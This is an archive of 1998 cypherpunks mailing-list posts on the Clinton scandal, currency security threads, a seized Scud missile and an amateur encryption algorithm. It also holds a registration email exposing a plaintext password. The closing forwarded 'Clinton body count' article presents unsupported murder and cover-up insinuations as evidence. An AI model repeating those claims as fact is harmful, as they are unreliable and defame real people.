Subject: Just who should Kenneth Starr work for next?
In-Reply-To: <3.0.3.32.19980925091151.006b98a0@ego.idcomm.com>
Message-ID: <Pine.LNX.3.96.980925095633.442A-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 25 Sep 1998, Pat Cain wrote:

> Folks - 
> 
> Allegedly a Reuters story, from sources unknown (too many forwards to give
> proper credit).
> 
> pjc
> 
> =====================================================
> Flynt offers Starr job as porno aide
> 

Pretty amusing.  After Billy has resigned/been impeached he could star in
porno movies that Flynt produces -- maybe use the proceeds to pay the
taxpayer back for all the wasted time and money.

The real problem with all this is that Star was forced to reveal exactly
what acts took place because Clinton insisted on defining the minutia of
what constituted "sexual relations" -- thus revealing whether he did or
didn't conform to that definition was mandatory.  The question of perjury
balances on these facts. 

Any adult with half a brain knows that sexual relations are relations that
are sexual in nature.  A reasonable man/woman (especially wives of
the adulterer in question) would consider oral sex sexual relations.

But that is beside the point.  Billy C is being hoist on his own petard. 
The fishing expedition discovery process allowed by sexual harrasment
suits were an invention of NOW (and the club of socialist lawyers that Mr
Clinton clearly is a member of.) 

By any stretch of the imagination Clinton has either perjured himself in
his civil deposition (a felony offense), perjured himself before a federal
grand jury (an even more serious felony offense), obstructed justice or
all three. 

Of course the whole thing could have been avoided if Clinton had simply
told the truth during the deposition and to the American people. 
(Actually it could have been avoided if Mr. Clinton had not made a habit
of making his private life a matter of public record). 

Now Clinton has put either himself or the Republic in a very precarious
situtation. 

(1) Either the perjury and obstruction of justice laws apply equally to
everyone, or they apply to no one.  If the judicial system fails to
enforce these laws they set an example.  Next time someone is under oath
they can decide what they can and can't lie about.  They can decide that
"alone" means something other than what a reasonable man would agree with.
They can decide to deceive the judge and jury if the prosecution is
hostile (as if the prosecution is ever anything but).  They can give
testimony before a federal grand jury over a closed circuit video feed so
that they are free to refuse to answer questions without chance of being
held in contempt and jailed. 

(2) Admit that he lied under oath and open himself up to prosecution (and
definite impeachment). 

(3) Resign and save (a) the Democratic Party (b) tax payers dollars (c)
his own skin

(4) Refuse (2) and (3) and trash the democratic party in the elections,
waste huge amounts of taxpayer dollars and jeopardize the institution of
the presidency and the legal system. (whats left of them ;-)

And before all the dems on this list bitch that I'm just being partisan
and just "let the man get on with his job" -- let me state that telling
the people the truth *is* part of "his job".  (and I'm neither a democrat
or a republican -- not that there is much differnce anymore)

We all laugh at and belittle politicians for lying to us when "their
mouths are moving", but when they move those mouths under oath they are
held to a high legal standard.  Would you prefer this standard not apply
when taking the oath of office?  Would you countenance a politician who,
appearing as a witness in a murder case, lied about who he had seen
stabbing whom?  Part of the oath of office swears out the fact that they
will faithfully execute the laws of the land.  Is this another sworn
oath we could write off as the "trappings" of the republic?

More importantly, as Noam Chomsky points out in "Manufacturing Consent",
lying politicians are the modern democratic equivalent of feudal tyrants
beating or executing citizens in more "uncivilized times".  When the king
decided to supress the power of the citizens he simply beat, killed or
imprisoned them.  When modern politicos want to relieve people of power
they lie to them straightfaced, then do whatever they choose.  The more
slick they are, the less the people even know whats being done to them --
and the more dangerous they are.  They become tools of force for those
who wish to buy them.  The velvet glove over the iron fist.  In this
Heinlein is dead right -- democracy is force.

If anyone could watch the clinton testimony on video tape and not believe
that he is a congenital liar then you are deluding yourself. 

And as for getting on with the business of government that most "liberals"
hope for: education, welfare, more money for more people -- maybe they
ought to start thinking more about what is being done *to* them than *for*
them. 

"When we got organized as a country and we wrote a fairly radical
Constitution with a radical Bill of Rights, giving a radical amount of
individual freedom to Americans, it was assumed that the Americans who had
that freedom would use it responsibly.... [However, now] there's a lot of
irresponsibility. And so a lot of people say there's too much freedom. 
When personal freedom's being abused, you have to move to limit it."
President Bill Clinton, MTV's "Enough is Enough" 3-22-94

(*gulp*, the Founders are rolling in their graves like blenders
on frappe.  The true colors of a "communitarian")

In any case, since I'm neither Demoblican or RepublicRat I see the whole
issue like a bystander at the crash of the Hindenberg.  The first flames
are breaking out on top and you know that the thing is made of hydrogen
and flammable materials.  The conflagration is not going to go out until
the fuel is exausted.  Between Lewinsky, TravelGate, FBIFileGate,
DonationGate, Whitewater, Elections, Satellite News and the Internet thats
a hell of a lot of fuel.  Add Y2K to the fire and you just know the thing
is going to burn to a cinder as it grounds out.  "Oh, the humanity"

Being of libertarian disposition I'm no fan of the nature of sexual
harrasment proceedings, but if you are the chief executive of those laws
then you must also live by them or risk undermining the very underpinnings
of the legal system.  If you want to be the banker in the game of
Monopoly, don't complain that you don't like the rules when someone
catches you cheating.

(i know the original post was intended humoursly, but I'm so tired of the
prevarication, deceit, etc I had to put a word or two in ;-) 

taking a deep breath,

jim burnes

"Libery cannot be preserved without a general knowledge among the 
people, who have .. a desire to know; .. that most dreaded and
envied kind of knowledge.  I mean of the characters and conduct 
of their rulers."
    -- John Adams
    A Dissertation on the Canon and Feudal Law [1765]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: registrar@mailer.switchboard.com (Switchboard Registrar)
Date: Fri, 25 Sep 1998 13:18:01 +0800
To: cypherpunks@toad.com
Subject: Welcome to Switchboard: [FBJJM,695]
Message-ID: <19980925180408454.AAA87@www1>
MIME-Version: 1.0
Content-Type: text/plain



To confirm your Switchboard registration, simply REPLY to this
letter.  DO NOT modify the "Subject:" field. Your new or updated
listing (and homepage if you created one) will NOT appear in
Switchboard until you do.

-----------------------------------------------------------------
 
Thank you for becoming a Switchboard member! To login at any time,
use the following password with your Email address:
 
     Email: cypherpunks@toad.com
  Password: OffFour
 
You can change your password to something familiar the next time
you login.
 
  [Please NOTE:  This is not a password for your Internet Service 
   Provider account or a valid login for Switchboard's Free E-mail 
   service.]
 
To log in to Switchboard, point your browser to our home page at 
http://www.switchboard.com and click the My Corner icon. From the My
Corner page, you can select either the Modify My Listing or the 
Create/Modify My Homepage Option.  You'll then be prompted to enter 
your complete email address as it appears above and your Switchboard 
password to login.
 
If you choose to **Modify your Listing** you'll have the opportunity 
to include the following:
  
Business information
Cell phone number
FAX number
Pager number
Home page URL
Groups you are affiliated with
Schools you attended
And more!
 
You can also take advantage of Switchboard's unique Knock-Knock
feature to secure your email address or add an alternate listing to 
identify a nickname, maiden name or additional family member. If 
necessary, logging in allows you also to change your password or 
unlist yourself.
 
If you choose to **Create / Modify your Homepage** you can take 
advantage of My Studio, Switchboard's easy-to-use, interactive 
homepage builder.  Switchboard homepages are FREE and My Studio makes 
it so simple that even a beginner internet user can create a stylish 
homepage in no time at all.  
 
Remember - only after you REPLY or LOG IN once will your listing (and 
homepage) appear in Switchboard as you requested. These actions verify 
to us that the e-mail address you supplied was valid.
 
If you have questions, point your browser to Switchboard's on-line 
help files at http://www.switchboard.com/suptctr.htm or write to 
webmaster@switchboard.com. (Do not reply to this letter with 
questions, because the Registrar is an automated mailbox and your 
letter may not be read by a person.) 
 
If you did not request Switchboard membership, either forward 
this letter to webmaster@switchboard.com with comments, or reply 
to this letter with the "Subject:" field changed to "cancel".
 
Thank you again for using Switchboard.  
 
P.S. Don't forget to try other My Corner offerings, like FREE E-mail!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pnet@proliberty.com
Date: Fri, 25 Sep 1998 17:20:07 +0800
To: "Vladimir Z. Nuri" <cypherpunks@cyberpass.net
Subject: Re: IP: Funny Money: New $20 FRNs are here
Message-ID: <v02140b01b2308b890230@[208.25.61.131]>
MIME-Version: 1.0
Content-Type: text/plain



Excerpt from the following:
>It also incorporates several
>>security features that have proved effective against would-be
>>counterfeiters: a watermark; enhanced security thread;

Of course no mention is made here of the enhanced ability for goons to
steal your money.

It has been reported that these 'security threads' enable detection
equipment at airports to measure, or estimate, the amount of cash a person
is carrying. This further enables seizures which are now taking place in
the proximity of US borders, with the excuse that the carrier of the cash
could be 'intended' to cross a border, without filing a customs report.
Mere possesion of 'large' amounts of cash, in the proximity of a US border,
is coming to be considered 'prima facie' evidence of 'money-laundering'.

See previous message:
>Date: Sat, 19 Sep 1998 08:32:43 -0400
>To: cypherpunks@cyberpass.net
>From: Robert Hettinga <rah@shipwright.com>
>Subject: IP: Tougher laws are sought to seize cash

If I had been smart enough to see this coming when they came out with the
new security threads in $100 bills, I never would have traded the old ones
in.

Of course, carrying gold or silver will set off the metal detectors too.

I wonder if diamonds show up on the scanners?

- Tom Paine


At 3:27 AM 9/25/98, Vladimir Z. Nuri wrote:
>From: believer@telepath.com
>Subject: IP: Funny Money: New $20 FRNs are here
>Date: Thu, 24 Sep 1998 17:05:38 -0500
>To: believer@telepath.com
>
>Source:  US Newswire
>http://www.usnewswire.com/topnews/Current_Releases/0924-109.txt
>
>U.S. Treasury, Federal Reserve Issue New $20 Note
>U.S. Newswire
>24 Sep 10:45
>
> U.S. Treasury, Federal Reserve Issue New $20 Note
> To: National and Financial Desks
> Contact: Hamilton Dix of the U.S. Department of the Treasury,
>          202-622-2960, or
>          Bob Moore of the Federal Reserve,
>          202-452-3215
>
>   WASHINGTON, Sept. 24 /U.S. Newswire/ -- Treasury Secretary Robert
>E. Rubin and Federal Reserve Board Chairman Alan Greenspan today
>announced the issuance of the redesigned $20 note, which includes new
>and modified security features to deter counterfeiting of U.S.
>currency.
>
>   Rubin and U.S. Treasurer Mary Ellen Withrow marked the
>issuance of the new notes in a ceremony at Treasury's Cash Room in
>Washington, D.C. More than two dozen regional events hosted by
>Federal Reserve banks and branches and major retailers were also
>conducted around the country.
>
>   "We have introduced a series of features that greatly raise the
>hurdle for counterfeiters," Rubin said. "Together these features
>amount to a formidable tool, and make spotting a counterfeit
>note easier than ever. For them to be effective, it is important that
>people stop for a moment to look for the new features."
>
>   The new $20 will replace older notes gradually, and older series
>$20 notes still in good condition will be recirculated. About
>$83 billion worth of $20 notes is currently in circulation, 80
>percent of those in the U.S. More than $450 billion worth of
>U.S. currency circulates around the globe.
>
>   The Series 1996 $20 note is the third U.S. currency note to be
>redesigned to include new and modified security features. New $10 and
>$5 notes are expected to be issued simultaneously in 2000, and a new
>$1 note with a more modest redesign will follow.
>
>   "We are confident that the introduction of this third redesigned
>note will be as smooth as that of the $100 and $50 notes," Chairman
>Greenspan said. "Older notes will not be recalled or devalued. All
>existing notes will continue to be legal tender."
>
>   Like the Series 1996 $100 and $50 notes introduced since 1996, the
>new $20 note has a familiar appearance. The size, color and
>historical subjects have not changed. It also incorporates several
>security features that have proved effective against would-be
>counterfeiters: a watermark; enhanced security thread; fine-line
>printing patterns; color-shifting ink; and a larger, off-center
>portrait that is the most noticeable change in the overall
>architecture of the note. There are also two features for the blind
>and visually impaired. The new $20 note includes a capability that
>will allow the development of technology to help the blind ascertain
>the denomination of their currency. In addition, the $20 and $50
>notes have a large numeral on the back that make the notes easier for
>millions of Americans with low vision to read.
>
>   The continuing introduction of redesigned notes is a critical
>component of the Federal government's anti-counterfeiting effort.
>The new series aims to maintain the security of the nation's currency
>as computerized reprographic technologies such as color copiers,
>scanners and printers become more sophisticated and more readily
>available. The $20 note is the most frequently counterfeited note in
>the United States.
>
>   Since the $20 note is so widely used in daily commerce and most
>frequently dispensed by ATMs, broad nationwide recognition of the new
>note when it is introduced will minimize apprehension on the part of
>the public. A public education campaign now underway encourages the
>public and people who handle cash every day to become familiar with
>the design and security features of the new notes. Retailers and
>financial institutions are educating their employees and customers by
>sending posters to their outlets, training cashiers, offering
>pamphlets to the public, and including information about the new note
>in advertising circulars and on shopping bags. More than 100
>constituency organizations have helped reach small business owners,
>loss prevention managers, visually impaired and older Americans, and
>others with a stake in the new note's introduction. U.S. embassies
>and consulates are using materials translated into 15 languages to
>conduct localized education outreach to ensure that local users of
>U.S. currency as well as financial institutions are prepared for the
>issuance of the new note.
>
>   Fact sheets on the new note, the history of U.S. currency and
>related agencies are available at http://www.moneyfactory.com.
>
> -0-
> /U.S. Newswire  202-347-2770/
> 09/24 10:45
>
>Copyright 1998, U.S. Newswire
>-----------------------
>NOTE: In accordance with Title 17 U.S.C. section 107, this material is
>distributed without profit or payment to those who have expressed a prior
>interest in receiving this information for non-profit research and
>educational purposes only. For more information go to:
>http://www.law.cornell.edu/uscode/17/107.shtml
>-----------------------
>
>
>
>
>**********************************************
>To subscribe or unsubscribe, email:
>     majordomo@majordomo.pobox.com
>with the message:
>     (un)subscribe ignition-point email@address
>**********************************************
>www.telepath.com/believer
>**********************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pnet@proliberty.com
Date: Fri, 25 Sep 1998 17:19:50 +0800
To: Larry Becraft <becraft@hiwaay.net>
Subject: Re: IP: National ID
Message-ID: <v02140b02b2308eefce99@[208.25.61.131]>
MIME-Version: 1.0
Content-Type: text/plain



>From: Larry Becraft <becraft@hiwaay.net>
>Subject: IP: National ID
>Date: Wed, 23 Sep 1998 17:17:56 -0500
>To: ignition-point@majordomo.pobox.com

>    The reason I write now is because we have only about another week
>(Oct. 2) to get in more objections to this regulation. I have just
>visited the DoT webpage

Do you have a URL for this page?

- tppt: Tom Paine, Perpetual Traveller; webmaster@proliberty.com
================================================================
The USA has the highest incarceration rate in the world (1.6 m)
Most of those in prison are there for victimless 'crimes' (63%)
Since 1979, property seized without trial, has increased by 2500%
In the 'War On Drugs', drugs do not die. People do.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Fri, 25 Sep 1998 18:49:52 +0800
To: <cypherpunks@cyberpass.net>
Subject: Is Toto in Kansas, or in MO
In-Reply-To: <199809252130.XAA24262@replay.com>
Message-ID: <000401bde8e0$2dd516e0$388195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain




Who said this, "Toto":

   	"A long time ago, being crazy meant something.
  	"Now, everybody's crazy."

    ?

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Fri, 25 Sep 1998 02:13:04 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Privacy: FTC Losing Patience w/Business
In-Reply-To: <199809240731.AAA25674@netcom13.netcom.com>
Message-ID: <3.0.5.32.19980925171547.00825620@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 03:20 PM 9/24/98 -0500, Petro wrote:
>At 2:31 AM -0500 9/24/98, Vladimir Z. Nuri wrote:
>>From: believer@telepath.com
>>Subject: IP: Privacy: FTC Losing Patience w/Business
>>Date: Wed, 23 Sep 1998 07:33:09 -0500
>>To: believer@telepath.com
>>
>>Source:  New York Times
>>http://www.nytimes.com/library/tech/98/09/biztech/articles/21privacy.html
>>
>>September 21, 1998
>>
>>F.T.C. 'Losing Patience' With Business on
>>A site called Soccer Patch (www.soccerpatch.com) is a trading post for
>>soccer-playing children who want to trade team patches. It lists the names,
>>e-mail addresses and in some cases the hometowns of children who want to
>>trade patches. That is a red flag for F.T.C. enforcers. They worry that
>>child molesters can use the information to find victims.
>
>	Since when is it the job of the F.T.C worry about child molesters?

It's always been Big Brothers business, to mind other peoples business.

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 25 Sep 1998 12:33:35 +0800
To: cypherpunks@Algebra.COM
Subject: An Extended Version of My Encryption Algorithm WEAK3
Message-ID: <360BD384.25A9228D@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



I have done a trial implementation of a number of suggestions received
for improving my encryption algorithm WEAK3 and have decided to
integrate a subset of these into WEAK3 to form an extended version of
it designated WEAK3-E. The added features are the following:

   1. Text block chaining. Two options are provided. These are similar 
      though not identical to the block chaining methods PBC and CBCC
      as described in B. Schneier's book.

   2. Another block chaining method that is specific to our scheme. It
      consists in modifying, depending on the text being processed, the
      pointers that are used to access the various pseudo-randomly
      generated tables of the algorithm.

   3. All pseudo-randomly generated tables used in the algorithm can now
      be refreshed at user specified periods.

   4. Checksums of the chaining values in (1) and (2) above are output
      to provide integrity checking.

An implementation in Fortran 90 is available in:

     http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper12

The rationales of design of the base version, WEAK3, are given in

     http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper11

The implemented new features largely follow the suggestions of CWL.
I like also to thank GR and CK for construcive critiques and TPS for
validating the program code. All eventual remaining deficiencies and
errors are however exclusively mine.

A binary executable file for PC may be downloaded through:

     http://www.stud.uni-muenchen.de/~mok-kong.shen/#software

Critiques comments and suggestions for improvements are sincerely
solicited.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Fri, 25 Sep 1998 21:00:50 +0800
To: David Emery <die@die.com>
Subject: Re: arms collectors...
In-Reply-To: <19980925195613.A3801@die.com>
Message-ID: <Pine.LNX.3.96.980925194047.1188A-100000@jb3.fastrans.net>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 25 Sep 1998, David Emery wrote:

> ----- Forwarded message from "Thomas B. Roach" <sigint@thegrid.net> -----
> 
> 
> Washington Times, 25 Sep 98
> Operable missile seized in customs
> By Bill Gertz THE WASHINGTON TIMES
> 
> U.S.  and British authorities are investigating how a Russian-design
> Scud missile was imported illegally by a weapons collector in
> California, The Washington Times has learned.
> 
> "This is a full-blown missile," said John Hensley, a senior agent of the
> U.S.  Customs Service in Los Angeles.  "The only thing missing is the
> warhead."
> 
> A Scud B missile and its mobile transporter-erector launcher --minus the
> warhead -- were seized Sept.  2 by customs agents in Port Hueneme,
> Calif., about 35 miles north of Los Angeles, said officials familiar
> with the case.
> 

Scuze me for picking nits, but if the missile doesn't have a
warhead then its just a rocket (plus some guidance systems).

When does a rocket become a "weapon of mass destruction"?

Maybe what American officials should be investigating is how US defense
contractors got an export license to sell ICBM components to the ChiCom's. 
I heard it was OK'd by the pres himself -- theorectically for big
campaign donations.

If those missiles are targeted at US, then that would constitute
blatant treason, would it not?

Inquiring minds want to know.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Emery <die@die.com>
Date: Fri, 25 Sep 1998 19:03:31 +0800
To: cypherpunks@toad.com
Subject: arms collectors...
Message-ID: <19980925195613.A3801@die.com>
MIME-Version: 1.0
Content-Type: text/plain



----- Forwarded message from "Thomas B. Roach" <sigint@thegrid.net> -----


Washington Times, 25 Sep 98
Operable missile seized in customs
By Bill Gertz THE WASHINGTON TIMES

U.S.  and British authorities are investigating how a Russian-design
Scud missile was imported illegally by a weapons collector in
California, The Washington Times has learned.

"This is a full-blown missile," said John Hensley, a senior agent of the
U.S.  Customs Service in Los Angeles.  "The only thing missing is the
warhead."

A Scud B missile and its mobile transporter-erector launcher --minus the
warhead -- were seized Sept.  2 by customs agents in Port Hueneme,
Calif., about 35 miles north of Los Angeles, said officials familiar
with the case.

The missile system was licensed for importation by the Bureau of
Alcohol, Tobacco and Firearms.  But paperwork in the case was falsified,
and the missile system was not "demilitarized" -- rendered inoperable --
as required by import rules, Mr.  Hensley told The Times.

British customs officials are investigating the seller, a small firm
outside London, and U.S.  investigators are questioning an arms
collector from Portola Valley, Calif., near Palo Alto, who bought the
system, Mr.  Hensley said.

The missile transfer has raised fears about the proliferation of weapons
of mass destruction and missile-delivery systems.  It also could be an
embarrassment for the Clinton administration, which is engaged in a
major international diplomatic effort to halt missile exports by Russia
and China to the Middle East.  The importation raises questions about
U.S.  national security controls.

Mr.  Hensley said U.S.  military experts examined the missile and
determined that it was produced in Czechoslovakia in 1985.  The missile
was identified as an SS-1C, which the Pentagon has designated as a Scud
B.

Transfers of missiles like the Scud B, with a range of 186 miles, are
banned under the international export agreement known as the Missile
Technology Control Regime.

Customs officials said the missile was not identified until it was
driven off the British freighter that delivered it and an inspector
called customs agents to examine it.

Such weapons can be imported but must first be cut up with a blowtorch
so they can never be reassembled.

The officials identified the buyer only as a wealthy man who is a U.S.
citizen.  He is a legitimate arms collector -- apparently not linked to
terrorists or illicit arms dealers.  But the false paperwork has raised
questions about the deal and prompted the U.S. investigation.

			 Mr.  Hensley said the buyer had purchased a Scud missile earlier
that had been properly rendered inoperable.  But a photograph of that
missile was attached to the illegal system, seized Sept.  2, in an
effort to fool customs officials.

After examining the missile, customs agents called the ATF and were
surprised to learn that an ATF license had been issued for the missile
importation.

"We thought they were nuts," said one official close to the case.  The
missile system is being stored at the Navy's Pacific Missile Testing
Center in nearby Point Mugu, near Oxnard, where it has been impounded.

John D'Angelo, an ATF agent in Los Angeles, had no official comment on
the case.  "Routinely, the ATF and U.S.  Customs Service examine items
to determine their suitability for importation under federal
regulations," he said.  "We have not yet completed the inspection of
this importation and therefore can't discuss it."

The SS-1 Scud is a liquid-fueled missile that is among the most widely
deployed weapons in the world.  It is in service with more than 16
nations.  Iraq's military forces were able to extend the range of the
missile, which was fired extensively during the 1991 Persian Gulf war.

The chassis of the missile's launcher was identified as a MAZ-543 truck
used commonly by the former Soviet and Warsaw Pact forces for
short-range missiles.

"The guidance was totally intact and the engine was ready to go," Mr.
Hensley said.  "All you needed to do was strap on a garbage can full of
C-4 and you had a weapon." C-4 is military high explosive.

Concerning how the missile was handled by the British firm, Mr.  Hensley
said, "It is illegal to import this into the U.K., so the Brits are
wondering how this guy got this company to do this."

Investigators suspect the missile may have been bought in Europe on the
black market.

"Our concern is not so much that [the buyer] might have a licensing
problem," Mr.  Hensley said.  "It's just that in the aftermath of the
embassy bombings in Africa and the Oklahoma City bombing, that this
could be a real problem."

The Customs Service is intensifying its efforts to check for illegal
imports of such weapons, he said.

Stephen Bryen, a former Pentagon technology-transfer official, said
weapons like the Scud must be fully dismantled before they can be
allowed into the country.

"You have to worry anytime somebody brings a missile into the United
States, whatever cover it might be," Mr.  Bryen said. He noted that
terrorists or rogue states could use such collectors to acquire missiles
illegally.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 25 Sep 1998 21:33:48 +0800
To: raymoon@moonware.dgsys.com
Subject: response much appreciated
Message-ID: <360C4F3D.5B6C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 9/25/98 7:34 PM

raymoon@moonware.dgsys.com
http://www.cis.ohio-state.edu/text/faq/usenet/assembly-language/x86/microsoft/faq.html

>Sorry, I have not done any ASM DLL programming and none with Visual
>Basic.  I looked for obvious errors but could not find any.
>
>Sorry that I could not be of any more help.
>
>Ray


Thanks so much for responding.

I have VB 6.0 and masm 6.11.

Got masm 6.11 working okay.

But I get an error 48 in VB 6.0.

I am sleuthing-out what is going wrong.

By starting simple.

I looked at the NT samples!

I notice that the NT 32 bit code is different from the 16 bit
api.

I thought I might have grossed you out.

And therefore got no response.

I am SICK about what happened.

But the word is getting out.  http://www.aci.net/kalliste/bw1.htm

I got PAID to write the attached.

I will let you know WITH SOURCE CODE of my progress.

And thanks so much for helping.

I am SUPER-PLEASED with

Applied Computer Online Services
2901 Moorpark Avenue Suite 100, San Jose, CA 95128, USA
el: (408) 248-8811 U.S. Sales: (888) 927-7543 or 888-9-APPLIED Fax:
(408) 249-2884

Sam and Joyce were VERY NICE.  Sam declared me a Delphi user.  And, 
therefore,  I got VB 6.0 for me for $261.43. http://www.samintl.com

With its 800 mb of documentation.  Grollier's encylopedia fits on a
650 mb cd rom!

I got a separate sheet showing the billing to my credit card.  Which
I will pass on.

Let me show you the machines I did the work for.

http://metriguard.com/HCLT.HTM

One version used the Forth from my book.

I wrote the assembler dlls for the PC Data System version which
interfaces to VB 3.0.

My feeling is that you might get some CONSULTING business if you create
a FORUM on masm at your site.

John Young is a LEADER on internet FORUMS http://www.jya.com/index.htm. 

And J Orlin Grabbe  http://www.aci.net/kalliste/, who edited the
attached article, is a leader on FORUMS on economics and CLINTON. 
Grabbe was on 60 minutes.

BUT you have to create a 

           DYNAMIC 

SIMPLE SITE containg INFORMATION OF USE.

Hope to hear from you again.  And NOTHING EVIL.

Other than MASM, FORTH, LINK, ML, NMAKE, Microsoft ... Worse, of couse,
than
the Great Satan.

best 
bill

Title: Black and White Test of Cryptographic Algorithms




	

	
		
			
				
					Jump to Forum
					Click Image to Jump to Next Article 
					Go to Text Only Print Version 
				
			
			
			Black and White Test
			of Cryptographic Algorithms
			by William H. Payne
			This article requires special formatting.
			Please Click Here to Read
			
				Send This Article to a Friend:
				
					
						
						 
					
						
							Your Name:
					
					
						
							
					
				
				
					 
					
						
							Email Address of your Friend: 
					
					
						
							
					
				
				
					 
					
						
							Your Email address:
					
					
						
							
					
				
				
					 
					 
					 
				
				
					 
					
						
							
					
				
			
			 
			Back to Home Page
			Quick Menu 
			Visit the Button Shop 
			
			
			Interactive Forum
			Black and White Test
			of Cryptographic Algorithms
			
			
			
			
			
			E-mail the Editor
			
			
			
			
			
			
			 
		
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NMIR <nmir@usa.net>
Date: Fri, 25 Sep 1998 15:17:48 +0800
To: sjmz@hplb.hpl.hp.com
Subject: Re: [salman rushdie]
Message-ID: <19980925192238.27047.qmail@www0n.netaddress.usa.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any idea what this guy is on about?.

Regards,

NMIR

www.netlink.co.uk/users/impact/namir/namirm.html

billp@nmol.com wrote:
dave
---
ABQ J 9/24/98 
Iran May Withdraw
Writer's Death Threat

LONDON - Author Salman
Rushdie met with British Foreign
Office officials Wednesday amid
reports Iran is preparing to
withdraw the threat on his life.
The late Ayatollah Ruhollah
Khomeini pronounced a "fatwa," death sentence, 
against Rushdie in
1989 after the publication of his
book "Satanic Verses," which many
Muslims deemed blasphemous.
Islamic militants then put a $2
million bounty on Rushdie's head,
forcing the author to live largely in
under British police protection.
---

I THINK that I heard tonight and saw 
Rushie's picture on TV that the above
was called off.

Progress.

I am reading again your stuff at
http://www.jya.com/filth-spot.htm

Let's all hope for release of the requested documents
and SETTLEMENT.

bill


> --------------------------------------------- 
>	Attachment: bw1.html  
>	MIME Type: text/html 
> --------------------------------------------- 

____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 25 Sep 1998 23:17:55 +0800
To: cypherpunks@cyberpass.net
Subject: clinton body count
Message-ID: <199809260419.VAA10300@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the sheeple shearing continues...

------- Forwarded Message

Date: 	Fri, 25 Sep 1998 10:50:33 -1000
From: Jonathan David Boyne <boyne@hawaii.edu>
To: Undisclosed recipients:;
Subject: [earthchanges] Re: The Clinton 'body count' - New alarm.. (fwd)



 http://www.worldnetdaily.com/exclusiv/980924.exrivero_clinton_bo.html
 THURSDAY SEPTEMBER 24, 1998
 
                    ------------------------------------------
                    [WorldNetDaily Exclusive]
                    ------------------------------------------
 
                    The Clinton 'body count'
                    New alarm over growing list
                    of dead close to president
 
                    By Michael Rivero
                    Copyright 1998, WorldNetDaily.com
 
                    "Dear Sir," began Monica Lewinsky's
                    somewhat peevish letter of July 3rd,
                    1997. In it, according to the recently
                    released report by Kenneth Starr, the
                    former intern chided the president for
                    failing to secure for her a new White
                    House job, and hinted that continued
                    stalling would result in word of their
                    affair leaking out.
 
                    The next day, Monica confronted Bill
                    Clinton in an Oval Office meeting she
                    described as "very emotional"; a meeting
                    which ended when the president warned
                    her, "It's illegal to threaten the
                    president of the United States."
 
                    Three days later, another former White
                    House intern, Mary Mahoney, was shot five
                    times in the back of the Georgetown
                    Starbuck's she managed. Two of her
                    co-workers were also killed. Even though
                    cash remained in the register, the triple
                    murder was quickly dismissed as a botched
                    robbery. No suspects have ever been
                    arrested.
 
                    Coincidence? Maybe.
 
                    Former Democratic National Committee
                    fundraiser and Commerce Secretary Ron
                    Brown was under criminal investigation.
                    Indictments seemed imminent. Ron Brown
                    had reportedly told a confidante that he
                    would, "not go down alone." Days later,
                    his plane crashed on approach to
                    Dubrovnik airport during a trade mission
                    excursion to Croatia. Military forensics
                    investigators were alarmed by what
                    appeared to be a .45-caliber bullet hole
                    in the top of Brown's head.
 
                    Coincidence? Maybe.
 
                    Yet another fundraiser was Larry
                    Lawrence, famed for his short residence
                    at Arlington National Cemetery. Less well
                    known is that he had been under criminal
                    investigation by the State Department for
                    three weeks when he died.
 
                    Coincidence? Maybe.
 
                    But for a growing number of Americans,
                    the sheer numbers of strange deaths
                    surrounding the career of Bill Clinton
                    has begun to raise serious questions. In
                    a meeting with Vernon Jordan, Monica
                    Lewinsky reportedly expressed fears that
                    she might, "end up like Mary Mahoney,"
                    and began to make sure that others knew
                    of her affair with Bill Clinton.
 
                    Of all the strange deaths surrounding the
                    Clintons, none has come under more
                    renewed scrutiny than the fate of White
                    House Deputy Counsel Vincent Foster, who
                    was found dead in Fort Marcy Park on July
                    20, 1993. The official investigation
                    concluded that Foster inserted a gun into
                    his mouth and pulled the trigger. Yet
                    according to the lab results neither
                    Foster's fingerprints nor blood was on
                    the gun, nor were powder granules or
                    bullet fragments traceable to that gun in
                    his wounds. The purported "suicide note"
                    was found to be a forgery by three
                    independent experts. The record of a
                    second wound on Foster's neck, and an FBI
                    memo that contradicts the official
                    autopsy, strongly suggests that Foster's
                    wounds were misrepresented in the
                    official report. The FBI's own records
                    revealed that deliberate deception was
                    used to link Foster with the gun found
                    with his body. Partly on the basis of
                    that evidence, the FBI is now in federal
                    court on charges of witness harassment
                    and evidence tampering in the case.
 
                    In normal police procedure, homicide is
                    assumed right from the start. Suicide
                    must be proven, because homicides are
                    often concealed behind phony suicides.
                    Yet in the case of Foster, serious doubts
                    persist regarding the credibility of the
                    evidence offered up in support of the
                    claim of suicide, and a recent Zogby Poll
                    revealed that more than two-thirds of all
                    Americans no longer think the official
                    conclusion of suicide is believable
 
                    The official conclusion regarding
